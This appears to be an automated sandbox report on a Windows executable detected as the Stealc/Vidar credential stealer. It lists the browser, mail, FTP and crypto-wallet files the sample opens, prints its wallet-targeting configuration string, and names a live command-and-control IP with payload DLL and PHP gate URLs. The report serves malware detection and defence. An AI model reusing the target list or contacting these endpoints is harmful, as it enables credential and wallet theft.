Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452910 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,RegOpenKeyW,RegEnumKeyW,RegCloseKey,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegQueryValueExW,RegCloseKey,DoEnvironmentSubstW,lstrlenW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452910
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468BA0 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468BA0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468D60 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468D60
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043EEB0 FindFirstFileW,FindClose, 0_2_0043EEB0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468FC0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,GetLastError, 0_2_00468FC0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042CF5F VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect, 0_2_0042CF5F
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWmJpE[
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: FHCAFIDB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: FHCAFIDB.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: FHCAFIDB.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: FHCAFIDB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FHCAFIDB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarer
Source: FHCAFIDB.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: FHCAFIDB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: FHCAFIDB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: FHCAFIDB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: FHCAFIDB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: FHCAFIDB.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: FHCAFIDB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: FHCAFIDB.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: FHCAFIDB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: FHCAFIDB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: FHCAFIDB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW f
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042F2D9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0042F2D9
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042CF5F VirtualProtect ?,-00000001,00000104,? 0_2_0042CF5F
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004570F0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary, 0_2_004570F0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042D11E SetUnhandledExceptionFilter, 0_2_0042D11E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042F2D9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0042F2D9
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043333D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043333D
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: fXg8zgxVTF.exe Binary or memory string: Shell_TrayWnd
Source: fXg8zgxVTF.exe Binary or memory string: OLEACC.dllntdll.dllRtlRandomSecureRemoveFile%I64dInvalid DateTimeInvalid DateTimeSpanVerdanaUndeleteMyFilesUndeleteMyFilesApplication is searching for deleted files. Do you want to terminate it?UndeleteMyFilesexplorerPlease close first mail recovery tool.http://seriousbit.com/openShell_TrayWndhttp://www.seriousbit.com/exploreropenInvalid DateTimeInvalid DateTimeSpanUndeleteMyFilesChoose the folder where you want MyUnDelete application to put recovered filesUndeleteMyFilesInvalid directory name.UndeleteMyFilesThe disk letter of source files is the same as disk letter of destination. It is strongly recommended that you choose another location.
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042E05D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0042E05D
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004346F9 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 0_2_004346F9
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0040E09D _memset,GetVersionExA, 0_2_0040E09D

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002FB5000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.walleti
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
95.182.96.50
 unknown Russian Federation
34518 FATUM-ASRussiaKazan420061Kosmonavtovstr29aRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://95.182.96.50/fee3b98529eb4b43/nss3.dll true
    		unknown
    http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll true
      		unknown
      http://95.182.96.50/fee3b98529eb4b43/freebl3.dll true
        		unknown
        http://95.182.96.50/fee3b98529eb4b43/mozglue.dll true
          		unknown
          http://95.182.96.50/fee3b98529eb4b43/sqlite3.dll true
            		unknown
            http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll true
              		unknown
              http://95.182.96.50/fee3b98529eb4b43/softokn3.dll true
                		unknown
                95.182.96.50/2aced82320799c96.php true
                  		unknown
                  http://95.182.96.50/ true
                    		unknown
                    http://95.182.96.50/2aced82320799c96.php true
                      		unknown